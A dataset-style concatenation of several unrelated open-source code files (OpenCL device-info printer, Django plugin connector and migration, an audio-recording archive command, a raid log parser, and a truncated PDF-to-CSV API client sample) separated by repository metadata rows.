(1 << 2): 'CL_DEVICE_TYPE_GPU',
(1 << 3): 'CL_DEVICE_TYPE_ACCELERATOR',
(1 << 4): 'CL_DEVICE_TYPE_CUSTOM'}
return options.get(info, 'Undefined Device Type')
def fp_config_formatting(info):
"""Translating the bit map into human readable categories."""
# From: OpenCL/AMDAPPSDK-3.0/include/CL/cl.h
options = [((1 << 0), 'CL_FP_DENORM'),
((1 << 1), 'CL_FP_INF_NAN'),
((1 << 2), 'CL_FP_ROUND_TO_NEAREST'),
((1 << 3), 'CL_FP_ROUND_TO_ZERO'),
((1 << 4), 'CL_FP_ROUND_TO_INF'),
((1 << 5), 'CL_FP_FMA'),
((1 << 6), 'CL_FP_SOFT_FLOAT'),
((1 << 7), 'CL_FP_CORRECTLY_ROUNDED_DIVIDE_SQRT')]
# The initial line shows the bitmap, following lines
# explicitly show the meaning and availability.
option_breakdown = [bin(info)]
for bitfield, option in options:
is_available = bool(bitfield & info)
option_breakdown.append('{}={}'.format(option, is_available))
return ('\n\t'+' '*(device_maxwidth+3)).join(option_breakdown)
def platform_extension_formatting(info):
"""Splitting the extensions and displaying each on aligned lines."""
return ('\n'+' '*(platform_maxwidth+3)).join(info.split())
def device_extension_formatting(info):
"""Splitting the extensions and displaying each on aligned lines."""
return ('\n\t'+' '*(device_maxwidth+3)).join(info.split())
# The following two option collections are lists of tuples with 2 or 3
# components. The first is the detail level at which it should be
# displayed. The second is the name of the parameter. The third is
# optional and should, if available, be a formatting function. The
# default is to use `str()`.
# Complete set of possible parameters for ocl.platform_info:
platform_info_options = [
(1, 'NAME'),
(4, 'PROFILE'),
(4, 'VENDOR'),
(1, 'VERSION'),
(2, 'EXTENSIONS', platform_extension_formatting)]
# Complete set of possible parameters for ocl.device_info:
device_info_options = [
(3, 'ADDRESS_BITS'),
(5, 'ATTRIBUTE_ASYNC_ENGINE_COUNT_NV'),
(1, 'AVAILABLE', bool),
(5, 'AVAILABLE_ASYNC_QUEUES_AMD'),
(5, 'BOARD_NAME_AMD'),
(3, 'BUILT_IN_KERNELS'),
(1, 'COMPILER_AVAILABLE', bool),
(5, 'COMPUTE_CAPABILITY_MAJOR_NV'),
(5, 'COMPUTE_CAPABILITY_MINOR_NV'),
(5, 'CORE_TEMPERATURE_ALTERA'),
(3, 'DOUBLE_FP_CONFIG', fp_config_formatting),
(1, 'DRIVER_VERSION'),
(4, 'ENDIAN_LITTLE'),
(4, 'ERROR_CORRECTION_SUPPORT', bool),
(4, 'EXECUTION_CAPABILITIES', bool),
(3, 'EXTENSIONS', device_extension_formatting),
(5, 'EXT_MEM_PADDING_IN_BYTES_QCOM'),
(5, 'GFXIP_MAJOR_AMD'),
(5, 'GFXIP_MINOR_AMD'),
(5, 'GLOBAL_FREE_MEMORY_AMD'),
(2, 'GLOBAL_MEM_CACHELINE_SIZE', memory_size),
(2, 'GLOBAL_MEM_CACHE_SIZE', memory_size),
(2, 'GLOBAL_MEM_CACHE_TYPE'),
(5, 'GLOBAL_MEM_CHANNELS_AMD'),
(5, 'GLOBAL_MEM_CHANNEL_BANKS_AMD'),
(5, 'GLOBAL_MEM_CHANNEL_BANK_WIDTH_AMD'),
(2, 'GLOBAL_MEM_SIZE', memory_size),
(3, 'GLOBAL_VARIABLE_PREFERRED_TOTAL_SIZE'),
(5, 'GPU_OVERLAP_NV'),
(3, 'HALF_FP_CONFIG', fp_config_formatting),
(3, 'HOST_UNIFIED_MEMORY', bool),
(3, 'IMAGE2D_MAX_HEIGHT'),
(3, 'IMAGE2D_MAX_WIDTH'),
(3, 'IMAGE3D_MAX_DEPTH'),
(3, 'IMAGE3D_MAX_HEIGHT'),
(3, 'IMAGE3D_MAX_WIDTH'),
(3, 'IMAGE_MAX_ARRAY_SIZE'),
(3, 'IMAGE_MAX_BUFFER_SIZE', memory_size),
(3, 'IMAGE_SUPPORT', bool),
(5, 'INTEGRATED_MEMORY_NV'),
(2, 'KERNEL_EXEC_TIMEOUT_NV'),
(1, 'LINKER_AVAILABLE', bool),
(5, 'LOCAL_MEM_BANKS_AMD'),
(2, 'LOCAL_MEM_SIZE', memory_size),
(5, 'LOCAL_MEM_SIZE_PER_COMPUTE_UNIT_AMD'),
(2, 'LOCAL_MEM_TYPE'),
(5, 'MAX_ATOMIC_COUNTERS_EXT'),
(2, 'MAX_CLOCK_FREQUENCY'),
(2, 'MAX_COMPUTE_UNITS'),
(2, 'MAX_CONSTANT_ARGS'),
(2, 'MAX_CONSTANT_BUFFER_SIZE', memory_size),
(2, 'MAX_GLOBAL_VARIABLE_SIZE'),
(2, 'MAX_MEM_ALLOC_SIZE', memory_size),
(4, 'MAX_ON_DEVICE_EVENTS'),
(4, 'MAX_ON_DEVICE_QUEUES'),
(4, 'MAX_PARAMETER_SIZE'),
(4, 'MAX_PIPE_ARGS'),
(4, 'MAX_READ_IMAGE_ARGS'),
(4, 'MAX_READ_WRITE_IMAGE_ARGS'),
(4, 'MAX_SAMPLERS'),
(2, 'MAX_WORK_GROUP_SIZE'),
(2, 'MAX_WORK_ITEM_DIMENSIONS'),
(2, 'MAX_WORK_ITEM_SIZES'),
(3, 'MAX_WRITE_IMAGE_ARGS'),
(4, 'MEM_BASE_ADDR_ALIGN'),
(5, 'ME_VERSION_INTEL'),
(4, 'MIN_DATA_TYPE_ALIGN_SIZE'),
(1, 'NAME'),
(4, 'NATIVE_VECTOR_WIDTH_CHAR'),
(4, 'NATIVE_VECTOR_WIDTH_DOUBLE'),
(4, 'NATIVE_VECTOR_WIDTH_FLOAT'),
(4, 'NATIVE_VECTOR_WIDTH_HALF'),
(4, 'NATIVE_VECTOR_WIDTH_INT'),
(4, 'NATIVE_VECTOR_WIDTH_LONG'),
(4, 'NATIVE_VECTOR_WIDTH_SHORT'),
(5, 'NUM_SIMULTANEOUS_INTEROPS_INTEL'),
(1, 'OPENCL_C_VERSION'),
(5, 'PAGE_SIZE_QCOM'),
#(5, 'PARENT_DEVICE'), # Somehow, this crashes Python.
(5, 'PARTITION_AFFINITY_DOMAIN'),
(5, 'PARTITION_MAX_SUB_DEVICES'),
(5, 'PARTITION_PROPERTIES'),
(5, 'PARTITION_TYPE'),
(5, 'PCI_BUS_ID_NV'),
(5, 'PCI_SLOT_ID_NV'),
(5, 'PIPE_MAX_ACTIVE_RESERVATIONS'),
(5, 'PIPE_MAX_PACKET_SIZE'),
(4, 'PLATFORM'),
(4, 'PREFERRED_GLOBAL_ATOMIC_ALIGNMENT'),
(4, 'PREFERRED_INTEROP_USER_SYNC'),
(4, 'PREFERRED_LOCAL_ATOMIC_ALIGNMENT'),
(4, 'PREFERRED_PLATFORM_ATOMIC_ALIGNMENT'),
(4, 'PREFERRED_VECTOR_WIDTH_CHAR'),
(4, 'PREFERRED_VECTOR_WIDTH_DOUBLE'),
(4, 'PREFERRED_VECTOR_WIDTH_FLOAT'),
(4, 'PREFERRED_VECTOR_WIDTH_HALF'),
(4, 'PREFERRED_VECTOR_WIDTH_INT'),
(4, 'PREFERRED_VECTOR_WIDTH_LONG'),
(4, 'PREFERRED_VECTOR_WIDTH_SHORT'),
(4, 'PRINTF_BUFFER_SIZE'),
(4, 'PROFILE'),
(5, 'PROFILING_TIMER_OFFSET_AMD'),
(3, 'PROFILING_TIMER_RESOLUTION'),
(4, 'QUEUE_ON_DEVICE_MAX_SIZE'),
(4, 'QUEUE_ON_DEVICE_PREFERRED_SIZE'),
(4, 'QUEUE_ON_DEVICE_PROPERTIES'),
(4, 'QUEUE_ON_HOST_PROPERTIES'),
(4, 'QUEUE_PROPERTIES'),
(4, 'REFERENCE_COUNT'),
(5, 'REGISTERS_PER_BLOCK_NV'),
(5, 'SIMD_INSTRUCTION_WIDTH_AMD'),
(5, 'SIMD_PER_COMPUTE_UNIT_AMD'),
(5, 'SIMD_WIDTH_AMD'),
(5, 'SIMULTANEOUS_INTEROPS_INTEL'),
(3, 'SINGLE_FP_CONFIG', fp_config_formatting),
(5, 'SPIR_VERSIONS'),
(5, 'SVM_CAPABILITIES'),
(5, 'THREAD_TRACE_SUPPORTED_AMD'),
(5, 'TOPOLOGY_AMD'),
(1, 'TYPE', device_type),
(1, 'VENDOR'),
(5, 'VENDOR_ID'),
(1, 'VERSION'),
(5, 'WARP_SIZE_NV'),
(5, 'WAVEFRONT_WIDTH_AMD')]
# Options which should be displayed are selected by their assigned level.
selector = lambda x: (x[0] <= detail_level)
platform_options = list(filter(selector, platform_info_options))
device_options = list(filter(selector, device_info_options))
# Some formatting preperations
template = '{1:<{0}} : {2}'
global platform_maxwidth
platform_maxwidth = max(map(len, (t[1] for t in platform_options)))
global device_maxwidth
device_maxwidth = max(map(len, (t[1] for t in device_options)))
for platform_idx, platform in enumerate(ocl.get_platforms()):
print(' Platform {}:'.format(platform_idx))
for tup in platform_options:
# Unpacking the option tuple. If there is no specified
# formatting function at index 2, assume `str`.
name = tup[1]
formatting = str if len(tup) < 3 else tup[2]
# Attempt to retrieve the information from the device,
# and assume none is available if the retrieval fails.
try:
info = platform.get_info(getattr(ocl.platform_info, name))
except:
info = 'Parameter not available.'
formatting = str
print(template.format(platform_maxwidth, name, formatting(info)))
for device_idx, device in enumerate(platform.get_devices()):
print('\t Device {}.{}:'.format(platform_idx, device_idx))
for tup in device_options:
# Unpacking the option tuple. If there is no specified
# formatting function at index 2, assume `str`.
name = tup[1]
formatting = str if len(tup) < 3 else tup[2]
# Attempt to retrieve the information from the device,
# and assume none is available if the retrieval fails.
try:
info = device.get_info(getattr(ocl.device_info, name))
except:
info = 'Parameter not available.'
formatting = str
print('\t'+template.format(device_maxwidth, name,
formatting(info)))
print()
return
if __name__ == '__main__':
print_devices(3)
|
mit
| -4,669,192,633,866,888,000 | 36.907662 | 82 | 0.580306 | false |
smartshark/serverSHARK
|
smartshark/utils/connector.py
|
1
|
2941
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Provide common connector methods via the BaseConnector.
"""
import string
import os
import server.settings
from django.conf import settings
from mongoengine import connect
class BaseConnector(object):
"""Basic connector execution stuff that is shared between connectors."""
def __init__(self):
mongo_connection = {
'host': server.settings.DATABASES['mongodb']['HOST'],
'port': server.settings.DATABASES['mongodb']['PORT'],
'db': server.settings.DATABASES['mongodb']['NAME'],
'username': server.settings.DATABASES['mongodb']['USER'],
'password': server.settings.DATABASES['mongodb']['PASSWORD'],
'authentication_source': server.settings.DATABASES['mongodb']['AUTHENTICATION_DB'],
'connect': False
}
connect(**mongo_connection)
def _add_parameters_to_install_command(self, path_to_script, plugin):
# we may have additional parameters
command = path_to_script + " "
for argument in plugin.argument_set.all().filter(type='install').order_by('position'):
# Add none if the value is not set, this needs to be catched in the install.sh of the plugin
if not argument.install_value.strip():
command += "None"
else:
command += argument.install_value + " "
return command
def _generate_plugin_execution_command(self, plugin_path, plugin_execution):
path_to_execute_script = '{}/{}/execute.sh'.format(plugin_path, str(plugin_execution.plugin))
# we have parmeters!
path_to_execute_script += " "
# Add parameter
command = path_to_execute_script + plugin_execution.get_sorted_argument_values()
# We need to substitute these here, if the mongodb is not secured
db_user = settings.DATABASES['mongodb']['USER']
if db_user is None or db_user == '':
db_user = 'None'
db_password = settings.DATABASES['mongodb']['PASSWORD']
if db_password is None or db_password == '':
db_password = 'None'
db_authentication = settings.DATABASES['mongodb']['AUTHENTICATION_DB']
if db_authentication is None or db_authentication == '':
db_authentication = 'None'
# Substitute stuff
return string.Template(command).safe_substitute({
'db_user': db_user,
'db_password': db_password,
'db_database': settings.DATABASES['mongodb']['NAME'],
'db_hostname': settings.DATABASES['mongodb']['HOST'],
'db_port': settings.DATABASES['mongodb']['PORT'],
'db_authentication': db_authentication,
'project_name': plugin_execution.project.name,
'plugin_path': os.path.join(plugin_path, str(plugin_execution.plugin)),
'cores_per_job': 1,
})
|
apache-2.0
| -9,102,070,737,227,791,000 | 36.705128 | 104 | 0.609317 | false |
KuangEleven/OreoRank
|
oreoranksite/oreorankapp/migrations/0001_initial.py
|
1
|
1191
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-30 00:26
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Cookie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
],
),
migrations.CreateModel(
name='CookieScore',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('score', models.FloatField()),
('cookie', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='oreorankapp.Cookie')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
gpl-2.0
| -4,792,136,927,355,026,000 | 33.028571 | 118 | 0.600336 | false |
HaroldMills/Vesper
|
vesper/command/add_recording_audio_files_command.py
|
1
|
24401
|
"""Module containing class `AddRecordingAudioFilesCommand`."""
from collections import defaultdict
from pathlib import Path, PureWindowsPath
import csv
import datetime
import logging
import random
from django.db import transaction
from vesper.archive_paths import archive_paths
from vesper.command.command import Command, CommandExecutionError
from vesper.django.app.models import Recording, RecordingFile
from vesper.singleton.recording_manager import recording_manager
import vesper.command.command_utils as command_utils
import vesper.command.recording_utils as recording_utils
_CSV_FILE_PATH = (
'/Users/harold/Desktop/NFC/Data/MPG Ranch/2012-2016 Recording File Lists/'
'2016_Archive_results.csv')
"""
Path of CSV file containing information about MPG Ranch recording audio
files that Debbie Leick generated on her computer. This file is used
for testing purposes only.
"""
_SIMULATED_ERROR_PROBABILITY = 0
"""
Simulated recording file read error probability.
This is for simulating file read errors during testing. For normal
operation it should be zero.
"""
class AddRecordingAudioFilesCommand(Command):
extension_name = 'add_recording_audio_files'
def __init__(self, args):
super().__init__(args)
get = command_utils.get_required_arg
self._station_names = frozenset(get('stations', args))
self._start_date = get('start_date', args)
self._end_date = get('end_date', args)
self._dry_run = get('dry_run', args)
def execute(self, job_info):
self._job_info = job_info
self._logger = logging.getLogger()
try:
self._log_intro()
# Get mapping from station names to nights to lists of
# recording files sorted by start time.
files = self._get_files(archive_paths.recording_dir_paths)
# self._show_files(files)
# self._compare_local_and_mpg_recording_files(files)
# Get mapping from station names to nights to lists of
# recordings sorted by start time.
recordings = self._get_recordings()
recording_files = self._assign_files_to_recordings(
files, recordings)
with transaction.atomic():
self._add_recording_files(recording_files)
except Exception as e:
log = self._logger.error
log('Command failed with an exception.')
log('The exception message was:')
log(f' {str(e)}')
log('The archive was not modified.')
log('See below for exception traceback.')
raise
return True
def _log_intro(self):
log = self._logger.info
if self._dry_run:
log('This command is running in dry run mode. After this '
'message it will log the same messages that it would '
'during normal operation, often including messages '
'indicating that it is modifying the archive database. '
'However, it will not actually modify the database.')
log('In this log, a recording in the archive database is '
'described by its station name, start time, sample rate, '
'number of channels, length in sample frames, and (in '
'parentheses number of clips per channel, for example:')
log(' Station 2020-02-10 01:23:45+00:00 24000.0 2 900000000 '
'(100, 200)')
log('A recording file in the archive database is described by its '
'file number, file name, sample rate, number of channels, '
'length in sample frames, and recording start offset in '
'sample frames, for example:')
log(' 0 Station_20200210_012345.wav 24000.0 2 500000000 0')
log('A recording file on disk is described before parsing by '
'its file system path, for example:')
log(r' C:\Users\Nora\2020 Archive\Recordings'
r'\Station_20200210_012345.wav')
log('or after parsing by its file name, sample rate, number '
'of channels, length in sample frames, and recording start '
'offset in sample frames, for example:')
log(' Station_20200210_012345.wav 24000.0 2 500000000 0')
def _get_files(self, recordings_dir_paths):
spec = {
'name': 'MPG Ranch Recording File Parser',
'arguments': {
'station_name_aliases_preset': 'Station Name Aliases'
}
}
file_parser = recording_utils.create_recording_file_parser(spec)
# `files` maps station names to nights to lists of file info bunches.
files = defaultdict(lambda: defaultdict(list))
# Build mapping from station names to nights to lists of files.
for dir_path in recordings_dir_paths:
for file_path in dir_path.glob('**/*.wav'):
try:
f = self._parse_file(file_path, file_parser)
except Exception as e:
class_name = e.__class__.__name__
self._logger.warning(
f'Could not parse recording file "{file_path}". '
f'Attempt raised {class_name} exception with message: '
f'{str(e)} File will be ignored.')
else:
# file parse succeeded
station_name = f.station.name
if station_name in self._station_names:
night = f.station.get_night(f.start_time)
if night >= self._start_date and \
night <= self._end_date:
files[station_name][night].append(f)
# Sort file lists by start time.
for station_files in files.values():
for night_files in station_files.values():
night_files.sort(key=lambda f: f.start_time)
return files
def _parse_file(self, file_path, file_parser):
if random.random() < _SIMULATED_ERROR_PROBABILITY:
raise Exception('A simulated error occurred.')
else:
return file_parser.parse_file(str(file_path))
def _show_files(self, files):
for station_name in sorted(files.keys()):
print(station_name)
station_files = files[station_name]
for night in sorted(station_files.keys()):
print(f' {night}')
night_files = station_files[night]
for f in night_files:
print(
f' "{f.path}",{f.num_channels},'
f'{f.sample_rate},{f.length}')
def _compare_local_and_mpg_recording_files(self, local_files):
local_files = self._create_local_files_dict(local_files)
mpg_files = self._create_mpg_files_dict(_CSV_FILE_PATH)
# self._show_recording_files_dict('local files', local_files)
# self._show_recording_files_dict('MPG files', mpg_files)
print()
print('local - MPG:')
self._show_differences(local_files, mpg_files)
print()
print('MPG - local:')
self._show_differences(mpg_files, local_files)
def _create_local_files_dict(self, files):
result = {}
for station_files in files.values():
for night_files in station_files.values():
for f in night_files:
file_name = Path(f.path).name
result[file_name] = (
f.num_channels, f.sample_rate, f.length)
return result
def _create_mpg_files_dict(self, csv_file_path):
result = {}
with open(csv_file_path, newline='') as file_:
reader = csv.reader(file_)
for row in reader:
file_name = PureWindowsPath(row[0]).name
channel_num = int(row[1])
sample_rate = float(row[2])
length = int(row[3])
result[file_name] = (channel_num, sample_rate, length)
return result
def _show_recording_files_dict(self, title, files):
print(f'{title}:')
for file_name in sorted(files.keys()):
info = files[file_name]
print(file_name, info)
def _show_differences(self, a, b):
for file_name in sorted(a.keys()):
b_info = b.get(file_name)
if b_info is None:
print(f'{file_name} absent')
elif b_info != a[file_name]:
print(f'{file_name} info differs: {a[file_name]} {b_info}')
def _get_recordings(self):
# `recordings` maps station names to nights to lists of recordings.
recordings = defaultdict(lambda: defaultdict(list))
# Build mapping from station names to nights to lists of recordings.
for r in Recording.objects.all().order_by(
'station__name', 'start_time'):
station_name = r.station.name
if station_name in self._station_names:
night = r.station.get_night(r.start_time)
if night >= self._start_date and night <= self._end_date:
recordings[r.station.name][night].append(r)
# Sort recording lists by start time.
for station_recordings in recordings.values():
for night_recordings in station_recordings.values():
night_recordings.sort(key=lambda r: r.start_time)
return recordings
def _assign_files_to_recordings(self, files, recordings):
"""Builds a mapping from recordings to lists of recording files."""
# Start with a mapping from recordings to empty lists. We do this
# to ensure there's an item in the mapping for every recording.
recording_files = {}
for station_name in sorted(recordings.keys()):
station_recordings = recordings[station_name]
for night in sorted(station_recordings.keys()):
for r in station_recordings[night]:
recording_files[r] = []
for station_name in sorted(files.keys()):
station_files = files[station_name]
for night in sorted(station_files.keys()):
night_recordings = recordings[station_name][night]
night_files = station_files[night]
for f in night_files:
recording = self._assign_file_to_recording(
f, night_recordings)
if recording is None:
# could not find recording for file
self._log_unassigned_file(f)
else:
# found recording for file
recording_files[recording].append(f)
return recording_files
def _assign_file_to_recording(self, file_, recordings):
recording = None
max_intersection = 0
for r in recordings:
# If recording has same start time as file, assign file to it,
# regardless of any intersection considerations. (We encountered
# a case where a file was misassigned to a recording with which
# it overlapped more than it did with another recording that
# shared its start time!)
if r.start_time == file_.start_time:
recording = r
break
intersection = self._get_intersection_duration(r, file_)
if intersection > max_intersection:
recording = r
max_intersection = intersection
return recording
def _get_intersection_duration(self, r, file_):
r_start = r.start_time
r_end = r.end_time
f_start = file_.start_time
duration = datetime.timedelta(seconds=file_.length / file_.sample_rate)
f_end = f_start + duration
if f_end <= r_start or f_start >= r_end:
return 0
else:
i_start = max(r_start, f_start)
i_end = min(r_end, f_end)
return (i_end - i_start).total_seconds()
def _log_unassigned_file(self, f):
file_string = self._get_file_string(f)
self._logger.warning(
f'Could not find recording for file {file_string}.')
def _add_recording_files(self, recording_files):
recordings = sorted(
recording_files.keys(),
key=lambda r: (r.station.name, r.start_time))
for r in recordings:
self._add_recording_files_aux(r, recording_files[r])
def _add_recording_files_aux(self, recording, files):
log_info = self._logger.info
r = recording
recording_string = self._get_recording_string(r)
log_info(f'Processing recording {recording_string}...')
db_files = list(r.files.all().order_by('file_num'))
if len(db_files) != 0:
# recording already has files in database
if self._compare_files(db_files, files):
log_info(
' Recording has matching files in archive database '
'and on disk.')
self._shorten_recording_length_if_needed(r, files)
else:
# recording has no files in database
if self._check_num_files(files) and \
self._check_file_sample_rates(r, files) and \
self._check_file_channels(r, files) and \
self._check_file_lengths(r, files):
self._add_files_to_database(r, files)
self._shorten_recording_length_if_needed(r, files)
def _get_recording_string(self, r):
clip_counts = self._get_recording_clip_counts(r)
return (
f'{r.station.name} {r.start_time} {r.sample_rate} '
f'{r.num_channels} {r.length} {clip_counts}')
def _get_recording_clip_counts(self, recording):
channels = recording.channels.all().order_by('channel_num')
return tuple(c.clips.count() for c in channels)
def _compare_files(self, db_files, disk_files):
if len(db_files) != 0 and len(disk_files) == 0:
self._report_missing_disk_files(db_files)
return False
elif self._files_match(db_files, disk_files):
return True
else:
self._report_files_mismatch(db_files, disk_files)
return False
def _report_missing_disk_files(self, db_files):
self._logger.warning(
' Recording has files in the archive database, but not '
'on disk.')
self._log_database_files(db_files, self._logger.warning)
self._log_no_action()
def _log_database_files(self, db_files, log):
log(' The database files are:')
for f in db_files:
log(
f' {f.file_num} {Path(f.path).name} '
f'{f.sample_rate} {f.num_channels} {f.length} '
f'{f.start_index}')
def _log_no_action(self):
self._logger.warning(' No action will be taken for this recording.')
def _files_match(self, db_files, disk_files):
if len(db_files) != len(disk_files):
return False
pairs = zip(db_files, disk_files)
return all(self._files_match_aux(*p) for p in pairs)
def _files_match_aux(self, db_file, disk_file):
db_name = Path(db_file.path).name
disk_name = Path(disk_file.path).name
return (
db_name == disk_name and
db_file.num_channels == disk_file.num_channels and
db_file.length == disk_file.length and
db_file.sample_rate == disk_file.sample_rate)
def _report_files_mismatch(self, db_files, disk_files):
log = self._logger.warning
log(
' Recording already has files in the archive '
'database, but they do not match the files on disk.')
self._log_database_files(db_files, log)
self._log_disk_files('The disk files are:', disk_files, log)
self._log_no_action()
def _log_disk_files(self, title, disk_files, log):
log(f' {title}')
for f in disk_files:
file_string = self._get_file_string(f)
log(f' {file_string}')
def _get_file_string(self, f):
return (
f'{Path(f.path).name} {f.start_time} {f.sample_rate} '
f'{f.num_channels} {f.length}')
def _shorten_recording_length_if_needed(self, recording, files):
r_length = recording.length
f_length = sum(f.length for f in files)
sample_rate = recording.sample_rate
two_seconds = 2 * sample_rate
if r_length - f_length == two_seconds:
# Recording length specified in database is exactly two
# seconds longer than total length of files. The
# `populate_archive` script that was used to populate
# web archives from desktop archives added two seconds
# to recording durations to try to ensure that the times
# of clips created by the original Old Bird detectors
# were within the time span of the recording. We remove
# this padding since it is not needed.
self._logger.info(
' Reducing recording duration by two seconds to '
'remove unneeded padding added by populate_archive script.')
recording.length = f_length
span = (f_length - 1) / sample_rate
recording.end_time = \
recording.start_time + datetime.timedelta(seconds=span)
if not self._dry_run:
recording.save()
def _check_num_files(self, files):
if len(files) == 0:
self._logger.warning(
' No files were found either in the archive database '
'or on disk for this recording.')
return False
else:
return True
def _check_file_sample_rates(self, recording, files):
sample_rate = recording.sample_rate
for f in files:
if f.sample_rate != sample_rate:
self._logger.warning(
' The sample rate of one or more of this '
"recording's files does not match that of the "
'recording.')
self._log_disk_files(
'The files are:', files, self._logger.warning)
self._log_no_action()
return False
# If we get here, the sample rates of all of the files
# matched the sample rate of the recording.
return True
def _check_file_channels(self, recording, files):
num_channels = recording.num_channels
for f in files:
if f.num_channels != num_channels:
self._logger.warning(
' The number of channels of one or more of this '
"recording's files does not match that of the "
'recording.')
self._log_disk_files(
'The files are:', files, self._logger.warning)
self._log_no_action()
return False
# If we get here, the number of channels of all of the files
# matched the number of channels of the recording.
return True
def _check_file_lengths(self, recording, files):
r_length = recording.length
f_length = sum(f.length for f in files)
two_seconds = 2 * recording.sample_rate
# The `populate_archive` script that was used to populate
# web archives from desktop archives added two seconds
# to recording durations to try to ensure that the times
# of clips created by the original Old Bird detectors
# were within the time span of the recording. We take
# that into consideration in the following comparison.
if r_length != f_length and r_length - f_length != two_seconds:
# recording and file lengths don't match
self._logger.warning(
" The total length of this recording's files "
'does not match that of the recording.')
self._log_disk_files('The files are:', files, self._logger.warning)
self._log_no_action()
return False
else:
# recording and file lengths match
return True
def _add_files_to_database(self, recording, files):
self._log_disk_files(
'Adding files to archive database:', files, self._logger.info)
start_index = 0
for file_num, f in enumerate(files):
# We store all paths in the archive database as POSIX
# paths, even on Windows, for portability, since Python's
# `pathlib` module recognizes the slash as a path separator
# on all platforms, but not the backslash.
path = self._get_relative_path(f.path).as_posix()
file_ = RecordingFile(
recording=recording,
file_num=file_num,
start_index=start_index,
length=f.length,
path=path)
if not self._dry_run:
file_.save()
start_index += f.length
def _get_relative_path(self, abs_path):
rm = recording_manager
try:
_, rel_path = rm.get_relative_recording_file_path(abs_path)
except ValueError:
dir_paths = rm.recording_dir_paths
if len(dir_paths) == 1:
s = f'the recording directory "{dir_paths[0]}"'
else:
path_list = str(list(dir_paths))
s = f'any of the recording directories {path_list}'
raise CommandExecutionError(
f'Recording file "{abs_path}" is not in {s}.')
return rel_path
|
mit
| -8,053,852,655,946,827,000 | 33.759259 | 79 | 0.512602 | false |
jimstorch/tokp
|
raid_parser_splits.py
|
1
|
1163
|
import glob
import time
import sys
import os
from optparse import OptionParser
#from tokp_lib.raidweeks_xml import RaidWeeksXML
#from tokp_lib.raidweeks_xml import raidweek_output
#from tokp_lib.datetime_range import datetime_range
from tokp_lib.roster import get_roster
from tokp_lib.parse_combat import parse_combat
from tokp_lib.parse_chat import parse_chat
from tokp_lib.write_summary import write_summary
usage = "usage: %prog [options]"
parser = OptionParser(usage=usage)
(options, args) = parser.parse_args()
## Define the start of the raid week (1=Monday, 6=Sunday)
options.raidweek_start = 2
t1 = time.time()
## Load the roster
roster = get_roster('roster/roster.txt')
## Parse the combat log looking for raids
logfiles = glob.glob('logs/split_logs/*.txt')
for combatlog in logfiles:
raids = parse_combat(combatlog, roster)
## Parse the chat log looking for loots
loots = []
#loots = parse_chat(options.chatlog, roster, options.name)
## Create the summary file
write_summary(options, raids, loots)
t2 = time.time()
print "[complete] Process time was %f seconds." % (t2 - t1)
|
gpl-3.0
| -3,864,553,970,490,699,000 | 27.075 | 62 | 0.710232 | false |
bytescout/ByteScout-SDK-SourceCode
|
Cloud API Server/PDF To CSV API/Python/Convert PDF To CSV From Uploaded File Asynchronously/ConvertPdfToCSVFromUploadedFileAsynchronously.py
|
1
|
4735
|
""" Cloud API asynchronous "PDF To Text" job example.
Allows to avoid timeout errors when processing huge or scanned PDF documents.
"""
import os
import requests # pip install requests
import time
import datetime
# Please NOTE: In this sample we're assuming Cloud Api Server is hosted at "https://localhost".
# If it's not then please replace this with with your hosting url.
# Base URL for PDF.co Web API requests
BASE_URL = "https://localhost"
# Source PDF file
SourceFile = ".\\sample.pdf"
# Comma-separated list of page indices (or ranges) to process. Leave empty for all pages. Example: '0,2-5,7-'.
Pages = ""
# PDF document password. Leave empty for unprotected documents.
Password = ""
# Destination CSV file name
DestinationFile = ".\\result.csv"
# (!) Make asynchronous job
Async = True
def main(args = None):
uploadedFileUrl = uploadFile(SourceFile)
if (uploadedFileUrl != None):
convertPdfToCSV(uploadedFileUrl, DestinationFile)
def convertPdfToCSV(uploadedFileUrl, destinationFile):
"""Converts PDF To CSV using PDF.co Web API"""
# Prepare URL for 'PDF To CSV' API request
url = "{}/pdf/convert/to/csv?async={}&name={}&password={}&pages={}&url={}".format(
BASE_URL,
Async,
os.path.basename(destinationFile),
Password,
Pages,
uploadedFileUrl
)
# Execute request and get response as JSON
response = requests.get(url, headers={ "content-type": "application/octet-stream" })
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# Asynchronous job ID
jobId = json["jobId"]
# URL of the result file
resultFileUrl = json["url"]
# Check the job status in a loop.
# If you don't want to pause the main thread you can rework the code
# to use a separate thread for the status checking and completion.
while True:
status = checkJobStatus(jobId) # Possible statuses: "working", "failed", "aborted", "success".
# Display timestamp and status (for demo purposes)
print(datetime.datetime.now().strftime("%H:%M.%S") + ": " + status)
if status == "success":
# Download result file
r = requests.get(resultFileUrl, stream=True)
if (r.status_code == 200):
with open(destinationFile, 'wb') as file:
for chunk in r:
file.write(chunk)
print(f"Result file saved as \"{destinationFile}\" file.")
else:
print(f"Request error: {response.status_code} {response.reason}")
break
elif status == "working":
# Pause for a few seconds
time.sleep(3)
else:
print(status)
break
else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
def checkJobStatus(jobId):
"""Checks server job status"""
url = f"{BASE_URL}/job/check?jobid={jobId}"
response = requests.get(url)
if (response.status_code == 200):
json = response.json()
return json["status"]
else:
print(f"Request error: {response.status_code} {response.reason}")
return None
def uploadFile(fileName):
"""Uploads file to the cloud"""
# 1. RETRIEVE PRESIGNED URL TO UPLOAD FILE.
# Prepare URL for 'Get Presigned URL' API request
url = "{}/file/upload/get-presigned-url?contenttype=application/octet-stream&name={}".format(
BASE_URL, os.path.basename(fileName))
# Execute request and get response as JSON
response = requests.get(url)
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# URL to use for file upload
uploadUrl = json["presignedUrl"]
# URL for future reference
uploadedFileUrl = json["url"]
# 2. UPLOAD FILE TO CLOUD.
with open(fileName, 'rb') as file:
